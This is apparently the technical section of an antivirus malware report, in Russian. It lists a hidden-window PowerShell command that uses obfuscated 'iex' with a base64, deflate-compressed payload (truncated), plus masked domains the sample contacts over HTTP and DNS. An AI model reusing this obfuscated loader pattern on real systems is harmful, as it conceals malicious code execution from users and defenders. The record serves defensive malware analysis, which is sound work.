Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $sHellid[1]+$SHeLLId[13]+'x') (New-objECT SYsTEm.iO.STreaMrEADEr((New-objECT iO.COMPRessIon.deFLaTesTREAM( [io.MEMORyStREaM] [COnveRt]::FRoMBAsE64StrInG( 'VZBNa8JAEIb/Sg4Lq1h3S6FQXAJCbbUH...
- 'gu####ansfer.com':80
- 'fr####utasima.net':80
- http://www.gu####ansfer.com/cGQPt/
- http://www.fr####utasima.net/m/
- DNS ASK gu####ansfer.com
- DNS ASK pr#####raktorista.ru
- DNS ASK no###ngame.tk
- DNS ASK fr####utasima.net
- DNS ASK ba###car.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $sHellid[1]+$SHeLLId[13]+'x') (New-objECT SYsTEm.iO.STreaMrEADEr((New-objECT iO.COMPRessIon.deFLaTesTREAM( [io.MEMORyStREaM] [COnveRt]::FRoMBAsE64StrInG( 'VZBNa8JAEIb/Sg4Lq1h3S6FQXAJCbbUH...' (со скрытым окном)